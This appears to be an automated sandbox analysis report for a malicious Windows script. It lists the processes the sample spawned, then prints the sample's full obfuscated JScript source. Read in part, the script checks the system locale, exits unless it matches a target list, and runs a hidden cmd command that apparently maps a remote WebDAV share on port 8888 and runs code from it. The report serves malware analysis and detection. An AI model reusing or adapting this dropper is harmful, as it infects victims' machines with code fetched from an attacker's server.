| Path: | C:\Windows\System32\wscript.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7d06b0000 |
| File size: | 170'496 bytes |
| MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 1 |
| Start time: | 04:33:15 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\cmd.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7a97f0000 |
| File size: | 289'792 bytes |
| MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 2 |
| Start time: | 04:33:15 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7699e0000 |
| File size: | 862'208 bytes |
| MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 3 |
| Start time: | 04:33:15 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff788560000 |
| File size: | 452'608 bytes |
| MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 4 |
| Start time: | 04:33:19 |
| Start date: | 13/01/2025 |
| Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff6bc1b0000 |
| File size: | 5'641'176 bytes |
| MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | false |
| Target ID: | 5 |
| Start time: | 04:33:19 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\cmd.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7a97f0000 |
| File size: | 289'792 bytes |
| MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 6 |
| Start time: | 04:33:20 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\net.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff738ae0000 |
| File size: | 59'904 bytes |
| MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | true |
| Target ID: | 7 |
| Start time: | 04:33:20 |
| Start date: | 13/01/2025 |
| Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff74bb60000 |
| File size: | 3'581'912 bytes |
| MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | false |
| Target ID: | 8 |
| Start time: | 04:33:20 |
| Start date: | 13/01/2025 |
| Path: | C:\Windows\System32\svchost.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x800000 |
| File size: | 55'320 bytes |
| MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Has exited: | false |
| Target ID: | 9 |
| Start time: | 04:33:20 |
| Start date: | 13/01/2025 |
| Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff74bb60000 |
| File size: | 3'581'912 bytes |
| MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
| Has elevated privileges: | false |
| Has administrator privileges: | false |
| Programmed in: | C, C++ or other language |
| Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
|---|
Code | ||
|---|---|---|
| 0 | function elewvp() { |
|
| 1 | this[thiceb + kqmtve + cnhdsncu + dhsmvmid] ( "dxvhe=[1031,3079,5127,4103,2055,3072];var ipkyjyob=this[qwzfsfx+cnhdsncu+fukmnebuz+thicoxm+thiceb+emcog+utyswqb+cvfwe](this[hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe][abyatt+fukmnebuz+thiceb+cnhdsncu+cvfwe+thiceb+esgkea+beyspvmhu+kyaoxgc+thiceb+ohekhtc+cvfwe](hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe+yehqxoab+oxenlle+vdvqnfvx+thiceb+dhsmvmid+dhsmvmid)[pfgmomq+thiceb+cuofzb+pfgmomq+thiceb+cnhdsncu+qrrewpgmu](ukpxtl+utusgpj+lkvtlxkoi+unblynltm+pnlwrkd+abyatt+vompakxk+pfgmomq+pfgmomq+lkvtlxkoi+lvooaf+mfacjfe+pnlwrkd+vompakxk+oxenlle+lkvtlxkoi+pfgmomq+drmhjtln+abyatt+cwdwb+utyswqb+cvfwe+fukmnebuz+cwdwb+dhsmvmid+vpbsjiu+ihugye+cnhdsncu+utyswqb+thiceb+dhsmvmid+drmhjtln+emcog+utyswqb+cvfwe+thiceb+fukmnebuz+utyswqb+cnhdsncu+cvfwe+jupohbma+cwdwb+utyswqb+cnhdsncu+dhsmvmid+drmhjtln+gyvwalhmt+cwdwb+ohekhtc+cnhdsncu+dhsmvmid+thiceb),16);for(fawcokjt=0;fawcokjt<dxvhe[dhsmvmid+thiceb+utyswqb+cuofzb+cvfwe+vdvqnfvx];++fawcokjt){if(ipkyjyob==dxvhe[fawcokjt]){ipkyjyob=true;break;}}if(ipkyjyob!==true)this[hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe][uegenzhu+ltvejzy+jupohbma+cvfwe]();this[hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe][abyatt+fukmnebuz+thiceb+cnhdsncu+cvfwe+thiceb+esgkea+beyspvmhu+kyaoxgc+thiceb+ohekhtc+cvfwe](hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe+yehqxoab+oxenlle+vdvqnfvx+thiceb+dhsmvmid+dhsmvmid)[fukmnebuz+ltvejzy+utyswqb](ohekhtc+iucduylmy+qrrewpgmu+vpbsjiu+pjixeu+ohekhtc+vpbsjiu+qwzfsfx+cwdwb+pmmno+thiceb+fukmnebuz+thicoxm+vdvqnfvx+thiceb+dhsmvmid+dhsmvmid+yehqxoab+thiceb+vhxtepde+thiceb+vpbsjiu+cqcxl+abyatt+cwdwb+iucduylmy+iucduylmy+cnhdsncu+utyswqb+qrrewpgmu+vpbsjiu+vtrywetv+emcog+utyswqb+kqmtve+cwdwb+rggtah+thiceb+cqcxl+hwrzqjn+thiceb+beyspvmhu+pfgmomq+thiceb+jrftendn+ltvejzy+thiceb+thicoxm+cvfwe+vpbsjiu+cqcxl+esgkea+ltvejzy+cvfwe+wkfajsn+jupohbma+dhsmvmid+thiceb+vpbsjiu+hiugkelqg+cvfwe+thiceb+iucduylmy+qwzfsfx+hiugkelqg+drmhjtln+jupohbma+utyswqb+kqmtve+cwdwb+jupohbma+ohekhtc+thiceb+yehqxoab+qwzfsfx+qrrewpgmu+gspcbyrwo+vpbsjiu+vdvqnfvx+cvfwe+cvfwe+qwzfsfx+shogengdy+pjixeu+pjixeu+wpapgjye+egckpfr+mnstbr+yehqxoab+wpapgjye+yskgl+mnstbr+yehqxoab+wpapgjye+yehqxoab+djnazll+vkfimk+xoihdi+pjixeu+jupohbma+utyswqb+kqmtve+cwdwb+jupohbma+ohekhtc+thiceb+yehqxoab+qwzfsfx+vdvqnfvx+qwzfsfx+vtrywetv+iwxzpwh+iwxzpwh+thicoxm+cvfwe+cnhdsncu+fukmnebuz+cvfwe+vpbsjiu+hiugkelqg+cvfwe+thiceb+iucduylmy+qwzfsfx+hiugkelqg+drmhjtln+jupohbma+utyswqb+kqmtve+cwdwb+jupohbma+ohekhtc+thiceb+yehqxoab+qwzfsfx+qrrewpgmu+gspcbyrwo+iwxzpwh+iwxzpwh+ohekhtc+iucduylmy+qrrewpgmu+vpbsjiu+pjixeu+ohekhtc+vpbsjiu+utyswqb+thiceb+cvfwe+vpbsjiu+ltvejzy+thicoxm+thiceb+vpbsjiu+drmhjtln+drmhjtln+wpapgjye+egckpfr+mnstbr+yehqxoab+wpapgjye+yskgl+mnstbr+yehqxoab+wpapgjye+yehqxoab+djnazll+vkfimk+xoihdi+fprtimi+rucfuuxi+rucfuuxi+rucfuuxi+rucfuuxi+drmhjtln+qrrewpgmu+cnhdsncu+kqmtve+pmmno+pmmno+pmmno+fukmnebuz+cwdwb+cwdwb+cvfwe+drmhjtln+iwxzpwh+iwxzpwh+ohekhtc+iucduylmy+qrrewpgmu+vpbsjiu+pjixeu+ohekhtc+vpbsjiu+fukmnebuz+thiceb+cuofzb+thicoxm+kqmtve+fukmnebuz+mnstbr+djnazll+vpbsjiu+pjixeu+thicoxm+vpbsjiu+drmhjtln+drmhjtln+wpapgjye+egckpfr+mnstbr+yehqxoab+wpapgjye+yskgl+mnstbr+yehqxoab+wpapgjye+yehqxoab+djnazll+vkfimk+xoihdi+fprtimi+rucfuuxi+rucfuuxi+rucfuuxi+rucfuuxi+drmhjtln+qrrewpgmu+cnhdsncu+kqmtve+pmmno+pmmno+pmmno+fukmnebuz+cwdwb+cwdwb+cvfwe+drmhjtln+yskgl+fehghjh+vkfimk+wpapgjye+rucfuuxi+egckpfr+fehghjh+hcmguxw+wpapgjye+yskgl+wpapgjye+hcmguxw+vkfimk+yehqxoab+qrrewpgmu+dhsmvmid+dhsmvmid,0,false);" ); |
|
| 2 | } | |
| 3 | iucduylmy = "t"; | |
| 4 | iucduylmy = "p"; | |
| 5 | iucduylmy = "H"; | |
| 6 | iucduylmy = "E"; | |
| 7 | iucduylmy = "H"; | |
| 8 | iucduylmy = "P"; | |
| 9 | iucduylmy = "w"; | |
| 10 | iucduylmy = "F"; | |
| 11 | iucduylmy = "m"; | |
| 12 | emcog = "E"; | |
| 13 | emcog = "I"; | |
| 14 | emcog = "x"; | |
| 15 | emcog = "v"; | |
| 16 | emcog = "r"; | |
| 17 | emcog = "I"; | |
| 18 | emcog = "p"; | |
| 19 | emcog = "I"; | |
| 20 | kyaoxgc = "M"; | |
| 21 | kyaoxgc = "T"; | |
| 22 | kyaoxgc = "k"; | |
| 23 | kyaoxgc = "w"; | |
| 24 | kyaoxgc = "F"; | |
| 25 | kyaoxgc = "y"; | |
| 26 | kyaoxgc = "j"; | |
| 27 | wkfajsn = "X"; | |
| 28 | wkfajsn = "S"; | |
| 29 | wkfajsn = "h"; | |
| 30 | wkfajsn = "Y"; | |
| 31 | wkfajsn = "d"; | |
| 32 | wkfajsn = "Y"; | |
| 33 | wkfajsn = "P"; | |
| 34 | wkfajsn = "W"; | |
| 35 | wkfajsn = "J"; | |
| 36 | wkfajsn = "F"; | |
| 37 | qrrewpgmu = "I"; | |
| 38 | qrrewpgmu = "K"; | |
| 39 | qrrewpgmu = "d"; | |
| 40 | qrrewpgmu = "E"; | |
| 41 | qrrewpgmu = "k"; | |
| 42 | qrrewpgmu = "j"; | |
| 43 | qrrewpgmu = "K"; | |
| 44 | qrrewpgmu = "t"; | |
| 45 | qrrewpgmu = "q"; | |
| 46 | qrrewpgmu = "d"; | |
| 47 | pmmno = "g"; | |
| 48 | pmmno = "S"; | |
| 49 | pmmno = "X"; | |
| 50 | pmmno = "y"; | |
| 51 | pmmno = "n"; | |
| 52 | pmmno = "m"; | |
| 53 | pmmno = "L"; | |
| 54 | pmmno = "d"; | |
| 55 | pmmno = "w"; | |
| 56 | egckpfr = "S"; | |
| 57 | egckpfr = "k"; | |
| 58 | egckpfr = "d"; | |
| 59 | egckpfr = "Y"; | |
| 60 | egckpfr = "i"; | |
| 61 | egckpfr = "9"; | |
| 62 | dhsmvmid = "S"; | |
| 63 | dhsmvmid = "k"; | |
| 64 | dhsmvmid = "E"; | |
| 65 | dhsmvmid = "J"; | |
| 66 | dhsmvmid = "n"; | |
| 67 | dhsmvmid = "l"; | |
| 68 | pjixeu = "A"; | |
| 69 | pjixeu = "W"; | |
| 70 | pjixeu = "X"; | |
| 71 | pjixeu = "Y"; | |
| 72 | pjixeu = "V"; | |
| 73 | pjixeu = "b"; | |
| 74 | pjixeu = "G"; | |
| 75 | pjixeu = "o"; | |
| 76 | pjixeu = "R"; | |
| 77 | pjixeu = "/"; | |
| 78 | thiceb = "U"; | |
| 79 | thiceb = "y"; | |
| 80 | thiceb = "V"; | |
| 81 | thiceb = "i"; | |
| 82 | thiceb = "h"; | |
| 83 | thiceb = "C"; | |
| 84 | thiceb = "M"; | |
| 85 | thiceb = "p"; | |
| 86 | thiceb = "k"; | |
| 87 | thiceb = "e"; | |
| 88 | rggtah = "d"; | |
| 89 | rggtah = "a"; | |
| 90 | rggtah = "d"; | |
| 91 | rggtah = "J"; | |
| 92 | rggtah = "x"; | |
| 93 | rggtah = "k"; | |
| 94 | vkfimk = "s"; | |
| 95 | vkfimk = "J"; | |
| 96 | vkfimk = "X"; | |
| 97 | vkfimk = "z"; | |
| 98 | vkfimk = "X"; | |
| 99 | vkfimk = "0"; | |
| 100 | hiugkelqg = "O"; | |
| 101 | hiugkelqg = "a"; | |
| 102 | hiugkelqg = "F"; | |
| 103 | hiugkelqg = "W"; | |
| 104 | hiugkelqg = "J"; | |
| 105 | hiugkelqg = "o"; | |
| 106 | hiugkelqg = "u"; | |
| 107 | hiugkelqg = "%"; | |
| 108 | wpapgjye = "O"; | |
| 109 | wpapgjye = "P"; | |
| 110 | wpapgjye = "E"; | |
| 111 | wpapgjye = "i"; | |
| 112 | wpapgjye = "N"; | |
| 113 | wpapgjye = "n"; | |
| 114 | wpapgjye = "m"; | |
| 115 | wpapgjye = "I"; | |
| 116 | wpapgjye = "v"; | |
| 117 | wpapgjye = "1"; | |
| 118 | mfacjfe = "j"; | |
| 119 | mfacjfe = "T"; | |
| 120 | mfacjfe = "r"; | |
| 121 | mfacjfe = "g"; | |
| 122 | mfacjfe = "W"; | |
| 123 | mfacjfe = "z"; | |
| 124 | mfacjfe = "F"; | |
| 125 | mfacjfe = "T"; | |
| 126 | cwdwb = "V"; | |
| 127 | cwdwb = "z"; | |
| 128 | cwdwb = "h"; | |
| 129 | cwdwb = "b"; | |
| 130 | cwdwb = "N"; | |
| 131 | cwdwb = "k"; | |
| 132 | cwdwb = "q"; | |
| 133 | cwdwb = "o"; | |
| 134 | ukpxtl = "O"; | |
| 135 | ukpxtl = "I"; | |
| 136 | ukpxtl = "Y"; | |
| 137 | ukpxtl = "s"; | |
| 138 | ukpxtl = "E"; | |
| 139 | ukpxtl = "G"; | |
| 140 | ukpxtl = "F"; | |
| 141 | ukpxtl = "T"; | |
| 142 | ukpxtl = "H"; | |
| 143 | vtrywetv = "K"; | |
| 144 | vtrywetv = "q"; | |
| 145 | vtrywetv = "F"; | |
| 146 | vtrywetv = "j"; | |
| 147 | vtrywetv = "Z"; | |
| 148 | vtrywetv = "k"; | |
| 149 | vtrywetv = "U"; | |
| 150 | vtrywetv = "e"; | |
| 151 | vtrywetv = "\""; | |
| 152 | thicoxm = "w"; | |
| 153 | thicoxm = "Q"; | |
| 154 | thicoxm = "S"; | |
| 155 | thicoxm = "l"; | |
| 156 | thicoxm = "s"; | |
| 157 | thicoxm = "s"; | |
| 158 | iwxzpwh = "F"; | |
| 159 | iwxzpwh = "r"; | |
| 160 | iwxzpwh = "b"; | |
| 161 | iwxzpwh = "a"; | |
| 162 | iwxzpwh = "H"; | |
| 163 | iwxzpwh = "T"; | |
| 164 | iwxzpwh = "&"; | |
| 165 | utyswqb = "p"; | |
| 166 | utyswqb = "S"; | |
| 167 | utyswqb = "G"; | |
| 168 | utyswqb = "w"; | |
| 169 | utyswqb = "w"; | |
| 170 | utyswqb = "C"; | |
| 171 | utyswqb = "h"; | |
| 172 | utyswqb = "x"; | |
| 173 | utyswqb = "T"; | |
| 174 | utyswqb = "n"; | |
| 175 | lvooaf = "p"; | |
| 176 | lvooaf = "Z"; | |
| 177 | lvooaf = "I"; | |
| 178 | lvooaf = "R"; | |
| 179 | lvooaf = "m"; | |
| 180 | lvooaf = "N"; | |
| 181 | esgkea = "k"; | |
| 182 | esgkea = "q"; | |
| 183 | esgkea = "n"; | |
| 184 | esgkea = "s"; | |
| 185 | esgkea = "v"; | |
| 186 | esgkea = "a"; | |
| 187 | esgkea = "Q"; | |
| 188 | esgkea = "b"; | |
| 189 | esgkea = "e"; | |
| 190 | esgkea = "O"; | |
| 191 | fukmnebuz = "V"; | |
| 192 | fukmnebuz = "A"; | |
| 193 | fukmnebuz = "f"; | |
| 194 | fukmnebuz = "X"; | |
| 195 | fukmnebuz = "b"; | |
| 196 | fukmnebuz = "r"; | |
| 197 | gspcbyrwo = "v"; | |
| 198 | gspcbyrwo = "z"; | |
| 199 | gspcbyrwo = "S"; | |
| 200 | gspcbyrwo = "I"; | |
| 201 | gspcbyrwo = "Y"; | |
| 202 | gspcbyrwo = "o"; | |
| 203 | gspcbyrwo = "M"; | |
| 204 | gspcbyrwo = "f"; | |
| 205 | shogengdy = "H"; | |
| 206 | shogengdy = "h"; | |
| 207 | shogengdy = "L"; | |
| 208 | shogengdy = "M"; | |
| 209 | shogengdy = "S"; | |
| 210 | shogengdy = ":"; | |
| 211 | jrftendn = "A"; | |
| 212 | jrftendn = "m"; | |
| 213 | jrftendn = "w"; | |
| 214 | jrftendn = "H"; | |
| 215 | jrftendn = "Z"; | |
| 216 | jrftendn = "K"; | |
| 217 | jrftendn = "y"; | |
| 218 | jrftendn = "q"; | |
| 219 | yehqxoab = "a"; | |
| 220 | yehqxoab = "K"; | |
| 221 | yehqxoab = "Y"; | |
| 222 | yehqxoab = "m"; | |
| 223 | yehqxoab = "q"; | |
| 224 | yehqxoab = "t"; | |
| 225 | yehqxoab = "o"; | |
| 226 | yehqxoab = "d"; | |
| 227 | yehqxoab = "."; | |
| 228 | unblynltm = "N"; | |
| 229 | unblynltm = "X"; | |
| 230 | unblynltm = "Y"; | |
| 231 | unblynltm = "D"; | |
| 232 | unblynltm = "L"; | |
| 233 | unblynltm = "q"; | |
| 234 | unblynltm = "Y"; | |
| 235 | cvfwe = "T"; | |
| 236 | cvfwe = "Z"; | |
| 237 | cvfwe = "F"; | |
| 238 | cvfwe = "f"; | |
| 239 | cvfwe = "x"; | |
| 240 | cvfwe = "Y"; | |
| 241 | cvfwe = "t"; | |
| 242 | kqmtve = "i"; | |
| 243 | kqmtve = "X"; | |
| 244 | kqmtve = "R"; | |
| 245 | kqmtve = "K"; | |
| 246 | kqmtve = "H"; | |
| 247 | kqmtve = "U"; | |
| 248 | kqmtve = "N"; | |
| 249 | kqmtve = "v"; | |
| 250 | vompakxk = "p"; | |
| 251 | vompakxk = "I"; | |
| 252 | vompakxk = "l"; | |
| 253 | vompakxk = "z"; | |
| 254 | vompakxk = "h"; | |
| 255 | vompakxk = "W"; | |
| 256 | vompakxk = "m"; | |
| 257 | vompakxk = "U"; | |
| 258 | beyspvmhu = "c"; | |
| 259 | beyspvmhu = "M"; | |
| 260 | beyspvmhu = "p"; | |
| 261 | beyspvmhu = "J"; | |
| 262 | beyspvmhu = "j"; | |
| 263 | beyspvmhu = "k"; | |
| 264 | beyspvmhu = "t"; | |
| 265 | beyspvmhu = "V"; | |
| 266 | beyspvmhu = "b"; | |
| 267 | jupohbma = "X"; | |
| 268 | jupohbma = "f"; | |
| 269 | jupohbma = "y"; | |
| 270 | jupohbma = "P"; | |
| 271 | jupohbma = "i"; | |
| 272 | jupohbma = "U"; | |
| 273 | jupohbma = "Q"; | |
| 274 | jupohbma = "O"; | |
| 275 | jupohbma = "D"; | |
| 276 | jupohbma = "i"; | |
| 277 | cqcxl = "u"; | |
| 278 | cqcxl = "r"; | |
| 279 | cqcxl = "P"; | |
| 280 | cqcxl = "O"; | |
| 281 | cqcxl = "O"; | |
| 282 | cqcxl = "v"; | |
| 283 | cqcxl = "F"; | |
| 284 | cqcxl = "-"; | |
| 285 | fehghjh = "l"; | |
| 286 | fehghjh = "I"; | |
| 287 | fehghjh = "x"; | |
| 288 | fehghjh = "n"; | |
| 289 | fehghjh = "o"; | |
| 290 | fehghjh = "m"; | |
| 291 | fehghjh = "N"; | |
| 292 | fehghjh = "I"; | |
| 293 | fehghjh = "7"; | |
| 294 | utusgpj = "j"; | |
| 295 | utusgpj = "l"; | |
| 296 | utusgpj = "P"; | |
| 297 | utusgpj = "G"; | |
| 298 | utusgpj = "f"; | |
| 299 | utusgpj = "i"; | |
| 300 | utusgpj = "K"; | |
| 301 | vhxtepde = "U"; | |
| 302 | vhxtepde = "x"; | |
| 303 | vhxtepde = "C"; | |
| 304 | vhxtepde = "k"; | |
| 305 | vhxtepde = "f"; | |
| 306 | vhxtepde = "I"; | |
| 307 | vhxtepde = "U"; | |
| 308 | vhxtepde = "a"; | |
| 309 | vhxtepde = "x"; | |
| 310 | uegenzhu = "F"; | |
| 311 | uegenzhu = "e"; | |
| 312 | uegenzhu = "T"; | |
| 313 | uegenzhu = "i"; | |
| 314 | uegenzhu = "R"; | |
| 315 | uegenzhu = "W"; | |
| 316 | uegenzhu = "s"; | |
| 317 | uegenzhu = "u"; | |
| 318 | uegenzhu = "Z"; | |
| 319 | uegenzhu = "Q"; | |
| 320 | pfgmomq = "p"; | |
| 321 | pfgmomq = "g"; | |
| 322 | pfgmomq = "X"; | |
| 323 | pfgmomq = "d"; | |
| 324 | pfgmomq = "a"; | |
| 325 | pfgmomq = "b"; | |
| 326 | pfgmomq = "R"; | |
| 327 | cuofzb = "T"; | |
| 328 | cuofzb = "g"; | |
| 329 | cuofzb = "I"; | |
| 330 | cuofzb = "H"; | |
| 331 | cuofzb = "F"; | |
| 332 | cuofzb = "g"; | |
| 333 | mnstbr = "y"; | |
| 334 | mnstbr = "H"; | |
| 335 | mnstbr = "z"; | |
| 336 | mnstbr = "R"; | |
| 337 | mnstbr = "y"; | |
| 338 | mnstbr = "3"; | |
| 339 | pnlwrkd = "a"; | |
| 340 | pnlwrkd = "k"; | |
| 341 | pnlwrkd = "u"; | |
| 342 | pnlwrkd = "g"; | |
| 343 | pnlwrkd = "y"; | |
| 344 | pnlwrkd = "k"; | |
| 345 | pnlwrkd = "R"; | |
| 346 | pnlwrkd = "_"; | |
| 347 | cnhdsncu = "P"; | |
| 348 | cnhdsncu = "l"; | |
| 349 | cnhdsncu = "s"; | |
| 350 | cnhdsncu = "R"; | |
| 351 | cnhdsncu = "F"; | |
| 352 | cnhdsncu = "S"; | |
| 353 | cnhdsncu = "A"; | |
| 354 | cnhdsncu = "c"; | |
| 355 | cnhdsncu = "a"; | |
| 356 | gyvwalhmt = "z"; | |
| 357 | gyvwalhmt = "B"; | |
| 358 | gyvwalhmt = "p"; | |
| 359 | gyvwalhmt = "Y"; | |
| 360 | gyvwalhmt = "E"; | |
| 361 | gyvwalhmt = "X"; | |
| 362 | gyvwalhmt = "n"; | |
| 363 | gyvwalhmt = "O"; | |
| 364 | gyvwalhmt = "s"; | |
| 365 | gyvwalhmt = "L"; | |
| 366 | qwzfsfx = "q"; | |
| 367 | qwzfsfx = "m"; | |
| 368 | qwzfsfx = "B"; | |
| 369 | qwzfsfx = "V"; | |
| 370 | qwzfsfx = "l"; | |
| 371 | qwzfsfx = "p"; | |
| 372 | ltvejzy = "b"; | |
| 373 | ltvejzy = "m"; | |
| 374 | ltvejzy = "d"; | |
| 375 | ltvejzy = "P"; | |
| 376 | ltvejzy = "j"; | |
| 377 | ltvejzy = "V"; | |
| 378 | ltvejzy = "D"; | |
| 379 | ltvejzy = "u"; | |
| 380 | ohekhtc = "m"; | |
| 381 | ohekhtc = "T"; | |
| 382 | ohekhtc = "T"; | |
| 383 | ohekhtc = "W"; | |
| 384 | ohekhtc = "b"; | |
| 385 | ohekhtc = "R"; | |
| 386 | ohekhtc = "y"; | |
| 387 | ohekhtc = "c"; | |
| 388 | rucfuuxi = "C"; | |
| 389 | rucfuuxi = "u"; | |
| 390 | rucfuuxi = "N"; | |
| 391 | rucfuuxi = "F"; | |
| 392 | rucfuuxi = "n"; | |
| 393 | rucfuuxi = "l"; | |
| 394 | rucfuuxi = "8"; | |
| 395 | vpbsjiu = "f"; | |
| 396 | vpbsjiu = "o"; | |
| 397 | vpbsjiu = "b"; | |
| 398 | vpbsjiu = "h"; | |
| 399 | vpbsjiu = "X"; | |
| 400 | vpbsjiu = " "; | |
| 401 | fprtimi = "S"; | |
| 402 | fprtimi = "z"; | |
| 403 | fprtimi = "P"; | |
| 404 | fprtimi = "o"; | |
| 405 | fprtimi = "J"; | |
| 406 | fprtimi = "o"; | |
| 407 | fprtimi = "c"; | |
| 408 | fprtimi = "E"; | |
| 409 | fprtimi = "@"; | |
| 410 | vdvqnfvx = "O"; | |
| 411 | vdvqnfvx = "f"; | |
| 412 | vdvqnfvx = "S"; | |
| 413 | vdvqnfvx = "g"; | |
| 414 | vdvqnfvx = "o"; | |
| 415 | vdvqnfvx = "e"; | |
| 416 | vdvqnfvx = "U"; | |
| 417 | vdvqnfvx = "h"; | |
| 418 | xoihdi = "I"; | |
| 419 | xoihdi = "T"; | |
| 420 | xoihdi = "y"; | |
| 421 | xoihdi = "N"; | |
| 422 | xoihdi = "o"; | |
| 423 | xoihdi = "5"; | |
| 424 | ihugye = "T"; | |
| 425 | ihugye = "f"; | |
| 426 | ihugye = "E"; | |
| 427 | ihugye = "B"; | |
| 428 | ihugye = "I"; | |
| 429 | ihugye = "D"; | |
| 430 | ihugye = "P"; | |
| 431 | oxenlle = "x"; | |
| 432 | oxenlle = "I"; | |
| 433 | oxenlle = "t"; | |
| 434 | oxenlle = "G"; | |
| 435 | oxenlle = "j"; | |
| 436 | oxenlle = "a"; | |
| 437 | oxenlle = "S"; | |
| 438 | lkvtlxkoi = "e"; | |
| 439 | lkvtlxkoi = "z"; | |
| 440 | lkvtlxkoi = "P"; | |
| 441 | lkvtlxkoi = "f"; | |
| 442 | lkvtlxkoi = "U"; | |
| 443 | lkvtlxkoi = "p"; | |
| 444 | lkvtlxkoi = "b"; | |
| 445 | lkvtlxkoi = "c"; | |
| 446 | lkvtlxkoi = "I"; | |
| 447 | lkvtlxkoi = "E"; | |
| 448 | hcmguxw = "X"; | |
| 449 | hcmguxw = "O"; | |
| 450 | hcmguxw = "v"; | |
| 451 | hcmguxw = "C"; | |
| 452 | hcmguxw = "D"; | |
| 453 | hcmguxw = "w"; | |
| 454 | hcmguxw = "f"; | |
| 455 | hcmguxw = "c"; | |
| 456 | hcmguxw = "6"; | |
| 457 | hwrzqjn = "G"; | |
| 458 | hwrzqjn = "w"; | |
| 459 | hwrzqjn = "L"; | |
| 460 | hwrzqjn = "Q"; | |
| 461 | hwrzqjn = "b"; | |
| 462 | hwrzqjn = "r"; | |
| 463 | hwrzqjn = "D"; | |
| 464 | hwrzqjn = "X"; | |
| 465 | hwrzqjn = "U"; | |
| 466 | hwrzqjn = "W"; | |
| 467 | abyatt = "q"; | |
| 468 | abyatt = "G"; | |
| 469 | abyatt = "S"; | |
| 470 | abyatt = "Q"; | |
| 471 | abyatt = "m"; | |
| 472 | abyatt = "C"; | |
| 473 | yskgl = "H"; | |
| 474 | yskgl = "A"; | |
| 475 | yskgl = "o"; | |
| 476 | yskgl = "r"; | |
| 477 | yskgl = "v"; | |
| 478 | yskgl = "M"; | |
| 479 | yskgl = "Z"; | |
| 480 | yskgl = "n"; | |
| 481 | yskgl = "4"; | |
| 482 | drmhjtln = "R"; | |
| 483 | drmhjtln = "V"; | |
| 484 | drmhjtln = "H"; | |
| 485 | drmhjtln = "v"; | |
| 486 | drmhjtln = "R"; | |
| 487 | drmhjtln = "i"; | |
| 488 | drmhjtln = "Y"; | |
| 489 | drmhjtln = "Q"; | |
| 490 | drmhjtln = "G"; | |
| 491 | drmhjtln = "\\"; | |
| 492 | djnazll = "w"; | |
| 493 | djnazll = "a"; | |
| 494 | djnazll = "L"; | |
| 495 | djnazll = "z"; | |
| 496 | djnazll = "p"; | |
| 497 | djnazll = "H"; | |
| 498 | djnazll = "w"; | |
| 499 | djnazll = "2"; | |
| 500 | elewvp ( ); |
|